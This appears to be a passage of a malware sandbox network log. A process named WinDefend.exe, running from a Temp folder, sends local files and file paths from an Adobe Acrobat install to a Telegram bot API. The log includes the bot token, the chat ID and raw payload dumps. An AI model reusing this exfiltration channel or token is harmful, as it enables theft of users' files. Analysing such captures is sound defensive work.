2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: 6e 74 20 33 37 20 30 20 52 20 0d 2f 52 65 73 6f 75 72 63 65 73 20 38 20 30 20 52 20 0d 2f 43 6f 6e 74 65 6e 74 73 20 39 20 30 20 52 20 0d 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 36 31 32 20 37 39 32 20 5d 20 0d 2f 43 72 6f 70 42 6f 78 20 5b 20 30 20 30 20 36 31 32 20 37 39 32 20 5d 20 0d 2f 52 6f 74 61 74 65 20 30 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 38 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 50 72 6f 63 53 65 74 20 5b 20 2f 50 44 46 20 5d 20 0d 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 47 53 32 20 34 35 20 30 20 52 20 3e 3e 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 39 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 32 32 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 48 89 64 56 5b Data Ascii: nt 37 0 R /Resources 8 0 R /Contents 9 0 R /MediaBox [ 0 0 612 792 ] /CropBox [ 0 0 612 792 ] /Rotate 0 >> endobj8 0 obj<< /ProcSet [ /PDF ] /ExtGState << /GS2 45 0 R >> >> endobj9 0 obj<< /Length 1226 /Filter /FlateDecode >> streamHdV[
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 47 53 32 20 34 35 20 30 20 52 20 3e 3e 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 31 35 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 35 38 30 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 48 89 5c 97 4b 8e 5d 37 0c 44 e7 06 bc 87 bb 02 45 12 f5 5d 41 16 90 25 34 10 23 88 3d 0a 10 20 bb cf 29 52 7a 6d bf 81 f1 70 d9 a2 c4 4f 55 91 ce 4f 7e 72 9a 9d 9f bf bf 7e f9 ed f7 3f ea f3 ed 9f af 5f ca f3 d7 f3 f5 4b 1b 2d 8d 5e 9f ba 7a 2a 6d 3c 3f 64 ea 69 ce fa 98 d5 54 57 7d be 63 6a 23 d5 d2 31 b5 b4 56 77 53 af c9 ca 7a 0c c7 ba 97 9b 6c a4 8c 83 ed cc 6f 9c 6a 2b ad ba 9f d6 70 1c e7 94 a5 3d b1 ec 64 b3 dc db ad d9 d3 d6 4a ad c5 83 96 d3 1e 4f db 33 59 df Data Ascii: xtGState << /GS2 45 0 R >> >> endobj15 0 obj<< /Length 1580 /Filter /FlateDecode >> streamH\K]7DE]A%4#= )RzmpOUO~r~?_K-^z*m<?diTW}cj#1VwSzloj+p=dJO3Y
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: eb bc f8 5e ca b7 f3 e2 09 b6 1e e7 45 59 65 c5 e1 76 5e aa f6 b0 51 87 f3 22 43 b9 bd ce 4b e7 eb d0 db 79 b1 74 ca 36 9c ce 8b b8 40 98 af f3 92 09 ad af f3 62 0b f5 c0 2f e7 c5 6b cd 0f e7 55 a3 57 bc ce 4b 9d a1 7e 39 2f e2 c1 79 af f3 02 af 6a b8 8f f5 02 f8 3e be ac 17 ac 1c c8 ba ad 97 e4 f8 e5 d6 c2 7a c1 e2 43 66 e3 b0 5e 70 56 5e f3 b0 5e e4 6b 1c ce cb b7 ba 3e 9c d7 94 22 ec af f3 92 0e e9 f5 70 5e 74 c9 dc 4f e7 65 c0 cb 86 1f ce 4b a9 ef af f3 52 dd 85 59 7b 9d 17 68 29 ba fa ed bc 72 b4 aa d7 79 31 d3 ed db 7a 41 00 02 f1 ed bd 28 fb 35 ed 35 5f 26 55 39 be cc 97 9e a0 29 8f f9 42 3c 96 75 98 2f 42 2c 2d 70 9a 2f 69 8e 7a 98 af 7a 19 98 cb 7c 91 fa e5 f5 db 7c f1 5a 4d bd ed 17 bd 40 57 7f fc 17 7f 55 9b 87 ff a2 f1 75 dd eb 36 60 28 40 5d Data Ascii: ^EYev^Q"CKyt6@b/kUWK~9/yj>zCf^pV^^k>"p^tOeKRY{h)ry1zA(55_&U9)B<u/B,-p/izz\|\|ZM@WUu6`(@]
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: d3 09 31 aa c6 e3 83 ee 1c 93 de e6 cd fc 91 7c 15 d2 f1 58 73 ab c2 9d 9e 95 ea 96 1f e1 a1 c0 95 d0 40 c9 c4 4c d9 85 66 15 f3 25 49 49 3d f4 53 13 af 4c 24 c9 66 a8 02 77 a0 7d 76 25 cd 26 1c a8 1e 4e 67 70 cf fd 7a 88 20 45 5e c1 0d 5a 2a 17 67 7f ed 5c 6a 0f 93 5a 06 24 88 a9 eb 6b 9e 8e 36 ff 50 7d 75 55 56 5a 31 6d 92 c5 1e a0 52 97 db bd 3f 6a bb 69 57 ef b7 96 3f 83 ea ee 30 bf ec fb f9 b0 c9 a9 83 82 ea 1d b7 0b 36 cd 1d 9d 14 cd 6f f4 35 2a 18 d2 f3 8f 53 5f 36 6e 73 88 86 8a d0 07 73 65 c0 b2 a4 9e 08 0a ed f6 ad c7 eb c2 c8 45 ce fb cd f4 79 63 98 fb ff 00 14 d4 b4 f1 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 32 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 54 79 70 65 20 2f 50 61 67 65 20 0d 2f 50 61 72 65 6e 74 20 33 36 20 30 20 52 Data Ascii: 1\|Xs@Lf%II=SL$fw}v%&Ngpz E^Zg\jZ$k6P}uUVZ1mR?jiW?06o5S_6nsseEycendstreamendobj22 0 obj<< /Type /Page /Parent 36 0 R
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: c7 83 85 93 c8 51 1f 0c e0 39 6d ff 44 2c 41 fd 7f 00 f9 4b 35 60 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 32 38 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 54 79 70 65 20 2f 50 61 67 65 20 0d 2f 50 61 72 65 6e 74 20 33 36 20 30 20 52 20 0d 2f 52 65 73 6f 75 72 63 65 73 20 32 39 20 30 20 52 20 0d 2f 43 6f 6e 74 65 6e 74 73 20 33 30 20 30 20 52 20 0d 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 36 31 32 20 37 39 32 20 5d 20 0d 2f 43 72 6f 70 42 6f 78 20 5b 20 30 20 30 20 36 31 32 20 37 39 32 20 5d 20 0d 2f 52 6f 74 61 74 65 20 30 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 32 39 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 50 72 6f 63 53 65 74 20 5b 20 2f 50 44 46 20 5d 20 0d 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 47 53 32 20 33 32 20 30 20 52 20 3e 3e Data Ascii: Q9mD,AK5`endstreamendobj28 0 obj<< /Type /Page /Parent 36 0 R /Resources 29 0 R /Contents 30 0 R /MediaBox [ 0 0 612 792 ] /CropBox [ 0 0 612 792 ] /Rotate 0 >> endobj29 0 obj<< /ProcSet [ /PDF ] /ExtGState << /GS2 32 0 R >>
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: 0d 0a 25 25 41 49 33 5f 4d 61 72 67 69 6e 3a 32 36 20 2d 31 35 20 2d 31 35 20 31 35 0d 0a 25 41 49 37 5f 47 72 69 64 53 65 74 74 69 6e 67 73 3a 20 37 32 20 38 20 37 32 20 38 20 31 20 30 20 30 2e 38 20 30 2e 38 20 30 2e 38 20 30 2e 39 20 30 2e 39 20 30 2e 39 0d 0a 25 41 49 39 5f 46 6c 61 74 74 65 6e 3a 20 30 0d 0a 25 25 45 6e 64 43 6f 6d 6d 65 6e 74 73 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 35 34 20 30 20 6f 62 6a 0d 2f 44 65 76 69 63 65 52 47 42 20 0d 65 6e 64 6f 62 6a 0d 35 35 20 30 20 6f 62 6a 0d 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 35 36 20 30 20 52 20 2f 48 65 69 67 68 74 20 31 32 38 20 2f 57 69 64 74 68 20 31 32 38 20 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 Data Ascii: %%AI3_Margin:26 -15 -15 15%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9%AI9_Flatten: 0%%EndCommentsendstreamendobj54 0 obj/DeviceRGB endobj55 0 obj<< /Filter /FlateDecode /Length 56 0 R /Height 128 /Width 128 /BitsPerComponent 8
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: 09 a8 72 17 70 fa 14 fa 01 29 fc 13 d4 a7 71 9d ca 6d ca 3c f2 98 f5 45 1f a7 fb de 3b c7 2f 4b 90 4f bb ca de 33 b3 ef cc ba c9 eb c1 c3 f5 ce 86 e9 dd f9 d5 4c e7 93 97 2a 50 3f 6e dc d1 be ec 6d 9f ee d7 1d 9b c1 07 1d 05 26 98 de a3 2f 2d 4b 7e d1 60 30 30 bd c1 05 22 f3 05 f2 de d9 61 a1 fc 8f db 54 6c ab f3 f9 95 7c 9b fd 8a b0 d0 f9 dd ba b9 b9 c9 9a 0b 61 ef 62 3b 64 fb e2 09 e5 a2 84 80 69 a5 da 5a ca db f3 2f cb b2 c0 eb cd 1f 4d 26 13 66 9a de ec bd da e7 8e 07 7c 91 0e 01 93 53 db 58 50 79 3b 8f 5b e3 f1 d8 f4 66 ef 44 61 85 2a 6c 67 6c 67 5e 18 11 a5 81 c9 d9 ac c5 a3 d1 c8 27 7c 51 46 da d1 83 8b 2e 48 61 eb 67 f2 66 b7 c9 64 96 24 bd ab a0 ea f7 fb 81 e0 67 24 04 d2 f3 78 3b cf 8c 0e 2e de 64 ad 17 0a 07 3f 0b 21 e8 7c 79 0d cc 52 ad ec 7f Data Ascii: rp)qm<E;/KO3LP?nm&/-K~`00"aTl\|ab;diZ/M&f\|SXPy;[fDalglg^'\|QF.Hagfd$g$x;.d?!\|yR
2024-05-23 13:34:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	61130	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:49 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="7923b787-ff45-47a9-8643-9418ef7c0093" Host: api.telegram.org Content-Length: 632 Expect: 100-continue
2024-05-23 13:34:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:50 UTC	40	OUT	Data Raw: 2d 2d 37 39 32 33 62 37 38 37 2d 66 66 34 35 2d 34 37 61 39 2d 38 36 34 33 2d 39 34 31 38 65 66 37 63 30 30 39 33 0d 0a Data Ascii: --7923b787-ff45-47a9-8643-9418ef7c0093
2024-05-23 13:34:50 UTC	101	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6c 6f 73 65 5f 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6c 6f 73 65 5f 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=close_x.png; filename*=utf-8''close_x.png
2024-05-23 13:34:50 UTC	306	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 0c 04 03 00 00 00 a4 5b 41 d4 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 1b 50 4c 54 45 ff ff ff 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 7e 27 86 8c 66 00 00 00 09 74 52 4e 53 00 11 22 33 44 cc dd ee ff e0 ff cf 19 00 00 00 09 70 48 59 73 00 00 0a eb 00 00 0a eb 01 82 8b 0d 5a 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 00 15 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 39 2f 31 30 2f 31 30 a8 8c 7f 68 00 00 00 50 49 44 41 54 08 99 63 08 53 60 60 10 4d 64 c8 48 62 60 8c 48 64 50 6b 53 10 6d 53 60 60 ca 48 8e 48 62 60 60 50 eb 00 72 18 18 98 3b 5a 80 24 83 28 Data Ascii: PNGIHDR[AsBITOPLTE~~~~~~~~~~~~~~~~~~~~~~~~'ftRNS"3DpHYsZtEXtSoftwareAdobe Fireworks CS6tEXtCreation Time9/10/10hPIDATcS``MdHb`HdPkSmS``HHb``Pr;Z$(
2024-05-23 13:34:50 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 37 39 32 33 62 37 38 37 2d 66 66 34 35 2d 34 37 61 39 2d 38 36 34 33 2d 39 34 31 38 65 66 37 63 30 30 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --7923b787-ff45-47a9-8643-9418ef7c0093Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:50 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:50 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 37 39 32 33 62 37 38 37 2d 66 66 34 35 2d 34 37 61 39 2d 38 36 34 33 2d 39 34 31 38 65 66 37 63 30 30 39 33 2d 2d 0d 0a Data Ascii: --7923b787-ff45-47a9-8643-9418ef7c0093--
2024-05-23 13:34:50 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:50 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	61132	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:50 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 177 Expect: 100-continue
2024-05-23 13:34:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:50 UTC	177	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 50 6f 69 6e 74 65 72 73 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 45 4e 55 25 35 43 50 6f 69 6e 74 65 72 73 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 34 35 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+Pointers.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CENU%5CPointers.pdf%0ASize%3A+45+KB
2024-05-23 13:34:51 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:50 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	61131	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:50 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="8b792bf8-c0c2-42be-bf27-b3ebe8d1efc5" Host: api.telegram.org Content-Length: 10382 Expect: 100-continue
2024-05-23 13:34:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:50 UTC	40	OUT	Data Raw: 2d 2d 38 62 37 39 32 62 66 38 2d 63 30 63 32 2d 34 32 62 65 2d 62 66 32 37 2d 62 33 65 62 65 38 64 31 65 66 63 35 0d 0a Data Ascii: --8b792bf8-c0c2-42be-bf27-b3ebe8d1efc5
2024-05-23 13:34:50 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:34:50 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 20 00 49 44 41 54 78 9c ed 7d 5b 8c 26 c7 75 de 77 aa fb bf cc 65 77 66 97 dc 5d 89 14 29 59 a2 75 a1 1c 1b 22 25 41 d6 25 59 29 b6 c4 e8 c1 40 64 0f 65 5b 11 20 1a 86 9c 20 b0 0d 24 50 1e f2 10 2d 13 23 80 fc e0 3c 24 c8 83 80 00 81 95 d0 14 57 a2 ae 74 74 a1 c9 25 e5 0b 29 89 89 6e a4 64 91 cb eb ee 72 77 67 97 73 9f f9 2f dd f5 e5 a1 aa ba ab ab ab fb ff 67 c9 58 b2 f2 1f 60 a6 7b ba eb 72 ea 5c be 73 aa ba ba 07 98 d1 8c 66 34 a3 19 cd 68 46 33 9a d1 8c 66 34 a3 19 cd 68 46 33 9a d1 8c 66 34 a3 19 cd 68 46 33 9a d1 8c 66 34 a3 19 cd 68 46 33 9a d1 cf 14 c9 df 75 87 f4 fa bc 1d 90 8f 07 f7 4f ae 40 56 b0 12 ad 7b 6a 75 55 8e bf 98 ce 4f 9d ca 2b 7f Data Ascii: PNGIHDR>a IDATx}[&uwewf])Yu"%A%Y)@de[ $P-#<$Wtt%)ndrwgs/gX`{r\sf4hF3f4hF3f4hF3f4hF3uO@V{juUO+
2024-05-23 13:34:50 UTC	4096	OUT	Data Raw: f7 e9 f9 88 dc 0b db 0f 13 c6 82 cd d2 53 2a 68 a0 35 ae 3e 76 0c 8b 07 0f e2 ec 99 33 b8 ac af 86 be ed a3 d8 7d cf 7b 31 f8 ea 3d 98 fb c6 fd 58 dc de 42 a7 3f 07 24 09 74 9e bb ef 93 80 0e 7a c3 ec 9f ac c6 ff 10 b2 db be 8f d0 34 2b 08 65 ed 21 0b b5 e9 b7 ae 67 69 e8 cf 18 aa 16 08 a8 a1 92 e4 a0 12 41 6a a1 81 45 67 be 02 fc 6b ce 8a da e2 7e 2c 4e 56 94 ef 2e 4c e9 f9 31 4f 8f 1a 58 7b 0e 52 5b fe 15 41 96 65 e8 f6 7a 78 f5 0d 37 e0 35 af bc 1e bd f1 18 b8 ee 7a c8 bf f8 43 0c fe c3 27 b0 fa 8f df 87 0d 51 c8 b6 b7 91 d8 71 d3 a2 98 10 70 1f 80 29 72 80 36 4f 0f 33 f9 d8 fd b6 7a 35 99 56 f7 ee 54 00 a4 a9 5d cb ab 9b 34 32 d7 9d 94 90 65 f3 15 1b 37 3a 94 9d f9 c2 0e 29 a6 98 30 44 38 78 ac e8 c6 32 42 eb 01 93 62 be 6f cd 35 38 b3 c2 af 19 58 b3 Data Ascii: S*h5>v3}{1=XB?$tz4+e!giAjEgk~,NV.L1OX{R[Aezx75zC'Qqp)r6O3z5VT]42e7:)0D8x2Bbo58X
2024-05-23 13:34:50 UTC	1872	OUT	Data Raw: a7 32 c1 bd 5d 63 71 a4 b6 8c 4f 0a 01 31 84 70 42 09 bd 79 52 b9 a9 3c 9e c1 39 9a bd 3e e6 b5 88 94 69 52 7e 5b 1b e1 fd 93 9c 5b 10 00 00 07 0b 49 44 41 54 10 21 bd b2 66 37 54 75 1f 44 d9 24 51 fb b2 47 59 d1 1b bb 6b cf 55 9c c0 87 57 5a 00 42 89 ee 8b c2 90 7c e4 73 cf 5c fa 81 33 39 e5 b7 ba 41 de b5 63 96 a5 12 11 bb 79 20 84 f0 50 71 4d e7 b1 10 e0 2b ba 6d 65 d0 c5 48 69 82 7b 7b 74 2b 68 12 f0 50 95 70 9d e7 36 cf 6d 42 a9 b6 3a 61 fd 68 dc f7 9f 93 b8 6a f6 e1 7a cc e0 8a 36 7d d4 2b d4 d9 3c 56 8f 07 02 2e f9 03 34 64 0c ca 80 d9 a7 4f 00 23 db a8 fd d7 b1 56 aa f7 f0 a9 af 6c 42 ff b0 2f 66 b7 80 16 11 15 4b 06 c3 81 b7 a1 41 a8 ec 98 71 f8 cf af a7 f5 f8 36 c5 4f e3 f5 b1 31 4c 6a c7 bf 3f 45 4e 41 18 ef 87 ae 7a 7e d9 5d 44 f9 05 4f 08 bc Data Ascii: 2]cqO1pByR<9>iR~[[IDAT!f7TuD$QGYkUWZB\|s\39Acy PqM+meHi{{t+hPp6mB:ahjz6}+<V.4dO#VlB/fKAq6O1Lj?ENAz~]DO
2024-05-23 13:34:50 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 38 62 37 39 32 62 66 38 2d 63 30 63 32 2d 34 32 62 65 2d 62 66 32 37 2d 62 33 65 62 65 38 64 31 65 66 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --8b792bf8-c0c2-42be-bf27-b3ebe8d1efc5Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:50 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:50 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 38 62 37 39 32 62 66 38 2d 63 30 63 32 2d 34 32 62 65 2d 62 66 32 37 2d 62 33 65 62 65 38 64 31 65 66 63 35 2d 2d 0d 0a Data Ascii: --8b792bf8-c0c2-42be-bf27-b3ebe8d1efc5--
2024-05-23 13:34:51 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:50 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	61133	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:51 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 186 Expect: 100-continue
2024-05-23 13:34:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:51 UTC	186	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 38 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Ccore_icons.png%0ASize%3A+28+KB
2024-05-23 13:34:51 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:51 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	61134	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:51 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f3440d2e-f13b-425e-9f40-142dcb442079" Host: api.telegram.org Content-Length: 47225 Expect: 100-continue
2024-05-23 13:34:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:51 UTC	40	OUT	Data Raw: 2d 2d 66 33 34 34 30 64 32 65 2d 66 31 33 62 2d 34 32 35 65 2d 39 66 34 30 2d 31 34 32 64 63 62 34 34 32 30 37 39 0d 0a Data Ascii: --f3440d2e-f13b-425e-9f40-142dcb442079
2024-05-23 13:34:51 UTC	103	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 50 6f 69 6e 74 65 72 73 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 50 6f 69 6e 74 65 72 73 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Pointers.pdf; filename*=utf-8''Pointers.pdf
